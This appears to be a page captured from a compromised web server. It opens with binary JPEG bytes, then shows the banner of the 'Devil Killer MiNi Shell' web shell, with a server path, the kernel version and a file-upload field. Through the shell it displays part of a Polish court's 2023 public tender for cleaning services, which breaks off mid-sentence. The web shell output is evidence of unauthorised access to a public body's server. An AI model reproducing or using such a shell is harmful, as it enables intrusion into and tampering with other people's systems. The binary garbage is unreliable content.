JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230427/0019655601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprzątanie i utrzymanie czystości w siedzibie Sądu Rejonowego w Piotrkowie Trybunalskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SĄD REJONOWY W PIOTRKOWIE TRYBUNALSKIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000323281</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 649 42 57</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gospodarczy@piotrkow-tryb.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.piotrkow-tryb.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zamawiający publiczny-jednostka sektora finansów publicznych-organ władzy publicznej-sąd </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprzątanie i utrzymanie czystości w siedzibie Sądu Rejonowego w Piotrkowie Trybunalskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b007dcfd-e4f1-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00196556</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00134334/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Sprzątanie i utrzymanie czystości w siedzibie Sądu Rejonowego w Piotrkowie Trybunalskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b007dcfd-e4f1-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia,<br/>która jest dostępna pod adresem https://ezamowienia.gov.pl (zwanej dalej „Platformą e-Zamówienia”.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Adres strony internetowej prowadzonego postępowania https://ezamowienia.gov.pl.<br/>4.. Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj<br/>postępowania/konkursy”).<br/>5. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin korzystania z Platformy<br/>e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>6. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>7. Pozostałe informacje zawarte są w rozdziale X SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące ochrony danych osobowych zamieszczone zostały w rozdziale XXVI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">G-262-2/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług sprzątania i utrzymania czystości<br/>w 3 budynkach Sądu Rejonowego w Piotrkowie Trybunalskim zlokalizowanych: w Piotrkowie Trybunalskim przy ul.<br/>Słowackiego 5, przy ul. Sieradzkiej 10/Rycerskiej 6 oraz w Ośrodku Kuratorskim działającym przy Sądzie Rejonowym w<br/>Piotrkowie Trybunalskim zlokalizowanym przy ul. Słowackiego 20, na łącznej powierzchni: 6031m2.<br/>2. Kod i nazwa przedmiotu zamówienia określona we Wspólnym Słowniku Zamówień:<br/>90910000-9 usługi sprzątania.<br/>3. Zamówienie obejmuje:<br/>3.1 sprzątanie bieżące polegające na wykonywaniu codziennych czynności mających na celu utrzymane czystości w:<br/>Ogłoszenie nr 2023/BZP 00186177/01 z dnia 2023-04-20<br/>2023-04-20 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3.1.1pomieszczeniach biurowych i innych pomieszczeniach wewnętrznych, które mieszczą się w dwóch połączonych<br/>łącznikiem budynkach: nowy budynek 5 kondygnacji (przyziemie, parter i 3 piętra), stary budynek 3 kondygnacje<br/>(przyziemie, parter, 1 piętro), przy ul. Słowackiego 5, 97-300 Piotrków Trybunalski - powierzchnia ok. 5 822 m2,<br/>3.1.2pomieszczeniu archiwum mieszczącym się przy ul. Sieradzkiej 10 /Rycerskiej (parter), 97-300 Piotrków Trybunalski -<br/>powierzchnia ok. 107 m2,<br/>3.1.3pomieszczeniach Ośrodka Kuratorskiego zlokalizowanych przy ul. Słowackiego 20 (I piętro), 97-300 Piotrków<br/>Trybunalski – powierzchnia ok. 100 m2.<br/>3.2 sprzątanie okresowe polegające na wykonaniu prac okresowych tj. myciu okien, praniu maszynowym dywanów i mebli<br/>tapicerowanych, myciu opraw oświetleniowych, myciu kratek wentylacyjnych, maszynowym myciu posadzek twardych,<br/>sprzątaniu po remontach, sprzątaniu garażu podziemnego.<br/>3.3 regularną dostawę na własny koszt środków czystości i środków higienicznych, dezynfekujących oraz narzędzi i<br/>urządzeń technicznych, niezbędnych do prawidłowej realizacji zamówienia.<br/>4. Szczegółowy opis przedmiotu zamówienia zawarty jest w:<br/>Załączniku nr 1 - Opis przedmiotu zamówienia,<br/>Załączniku nr 2 - Wzór umowy,<br/>Załączniku nr 3 - Formularz oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji na podstawie art. 441 ust. 1 ustawy Pzp, w wysokości nie<br/>większej niż 10 % wartości przyszłej umowy. Zwiększenie przedmiotu zamówienia nastąpi w przypadku zmian<br/>organizacyjnych skutkujących zwiększeniem powierzchni zewnętrznych lub wewnętrznych wymagających wykonania usług.<br/>Zamawiający nie jest zobowiązany do zlecenia usług objętych prawem opcji.<br/>W trakcie obowiązywania Umowy Zamawiający przewiduje możliwość skorzystania z prawa opcji również na wypadek,<br/>gdy wartość wynagrodzenia, o którym mowa w załączniku nr 2 - Wzór umowy, przewidzianego dla Wykonawcy, będzie<br/>miała zostać wykorzystana przed terminem końcowym realizacji umowy, o którym mowa w § 2 wzoru Umowy.<br/>W ramach prawa opcji Zamawiający zwiększy wynagrodzenie, o którym mowa w § 11 ust. 1 wzoru umowy, o<br/>maksymalnie 10%.<br/>Skorzystanie z prawa opcji jest uprawnieniem, a nie obowiązkiem Zamawiającego, a Wykonawcy nie przysługują żadne<br/>roszczenia z tego tytułu.<br/>Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie pisemnego oświadczenia woli przez<br/>Zamawiającego o skorzystaniu z tego prawa, w którym Zamawiający ustali wysokość podwyższenia wartości umowy.<br/>Oświadczenie takie jest dla Wykonawcy wiążące. Brak pisemnego oświadczenia woli ze strony Zamawiającego<br/>o skorzystaniu z prawa opcji nie może stanowić podstaw do realizacji zamówienia opcjonalnego przez Wykonawcę.<br/>Oświadczenie takie jest dla Wykonawcy wiążące.<br/>Zamawiający zastrzega sobie możliwość etapowej (tj. jednokrotnej lub wielokrotnej) realizacji zamówienia w ramach<br/>prawa opcji, której wartość łączna nie może przekroczyć wysokości maksymalnej, jak również skorzystania z tego prawa w<br/>niepełnym zakresie,w zależności od potrzeb Zamawiającego. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-06-21 do 2024-06-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>Kryterium Cena oferty brutto w zł (C)<br/>Kryterium Aspekty społeczne - zatrudnienie osób z niepełnosprawnością do wykonania czynności w ramach realizacji zamówienia<br/>(S) - Szczegółowy sposób oceny ofert wskazany został w Rozdziale XVIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne – zatrudnienie osób z niepełnosprawnością do wykonywania czynności w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej lub finansowej pozwalającej na udział w<br/>postępowaniu, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia z sumą gwarancyjną tego ubezpieczenia nie mniejszą niż: 300.000 zł<br/>(słownie: trzysta tysięcy złotych).<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie ( a w przypadku świadczeń okresowych lub<br/>ciągłych również wykonuje), co najmniej dwie usługi sprzątania i utrzymania czystości, w budynku użyteczność publicznej, o<br/>wartości nie mniejszej niż 400.000,00 zł (słownie: czterysta tysięcy złotych) brutto rocznie każda;<br/>UWAGA: pod pojęciem „budynek użyteczności publicznej” Zamawiający rozumie „budynek przeznaczony na potrzeby<br/>administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki,<br/>wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług<br/>pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym,<br/>morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek<br/>użyteczności publicznej uznaje się także budynek biurowy lub socjalny” zgodnie z brzmieniem § 3 ust 6 Rozporządzenia<br/>Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i<br/>ich usytuowanie (Dz. U z 2022 r. poz. 1225).<br/>3. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy, może mieć negatywny wpływ na realizację zamówienia.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w odniesieniu do konkretnego<br/>zamówienia lub jego części polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>5. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>6. Wykonawca nie może po upływie terminu składania ofert powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>7. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie warunków udziału w<br/>postępowaniu określonych w ust. 2 oceniane będzie łącznie;<br/>8. Spełnienie warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>będzie weryfikowane przez Zamawiającego zgodnie z art. 117 ust. 3 ustawy Pzp; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie braku podstaw wykluczenia:<br/>Wykonawca przedłoży na wezwanie Zamawiającego na potwierdzenie braku podstaw wykluczenia na podstawie:<br/>2.1. art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp - informację z Krajowego Rejestru Karnego sporządzoną nie wcześniej niż 6 miesięcy<br/>przed jej złożeniem;<br/>2.2. art. 108 ust. 1 pkt 3, art. 108 ust. 1 pkt 4 w zakresie dotyczącym orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 w zakresie dotyczącym zawarcia z innymi wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy Pzp - oświadczenie Wykonawcy o aktualności informacji<br/>zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp - wzór oświadczenia stanowi Załącznik nr 6 do SWZ;<br/>2.3. art. 108 ust. 1 pkt 5 ustawy Pzp - oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2021 poz. 275 ze zm.), z innym Wykonawcą,<br/>który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej<br/>zgodnie z treścią Załącznika nr 9 do SWZ aktualne na dzień złożenia;<br/>2.4. art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835) - oświadczenie Wykonawcy o<br/>niepodleganiu wykluczeniu w zakresie wskazanym przez Zamawiającego, wg Załącznika nr 10 do SWZ. Dokument zobowiązani są<br/>złożyć również podwykonawcy lub podmioty, na których zdolności polega się w rozumieniu dyrektyw w sprawie zamówień<br/>publicznych, w przypadku gdy przypada na nich ponad 10 % wartości zamówienia;<br/>2.5. art. 5 k rozporządzenia 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji<br/>destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 229 z 31.7.2014, str. 1) - oświadczenie Wykonawcy o niepodleganiu<br/>wykluczeniu w zakresie wskazanym przez zamawiającego zgodnie z Załącznikiem nr 11 do SWZ. Dokument zobowiązani są złożyć<br/>również podwykonawcy lub podmioty, na których zdolności polega się w rozumieniu dyrektyw w sprawie zamówień publicznych, w<br/>przypadku gdy przypada na nich ponad 10 % wartości zamówienia;<br/>2.6. art. 109 ust. 1 pkt 4 ustawy Pzp - odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji sporządzonego nie wcześniej niż 3<br/>miesiące przed jego złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>podmiotowe środki dowodowe na potwierdzenie spełniania warunków udziału w postępowaniu, a mianowicie:<br/>1.1. na potwierdzenie sytuacji ekonomicznej lub finansowej:<br/>Wykonawca zobowiązany jest przedłożyć Zamawiającemu polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej<br/>z przedmiotem niniejszego zamówienia na sumę gwarancyjną nie mniejszą niż<br/>300 000,00 zł (słownie: trzysta tysięcy złotych) wraz z potwierdzeniem opłacenia składki ubezpieczeniowej, jeśli z treści polisy nie<br/>wynika klauzula, zgodnie z którą Wykonawca jest objęty ochroną ubezpieczeniową pomimo braku opłacenia składki.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków<br/>dowodowych, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie<br/>opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się 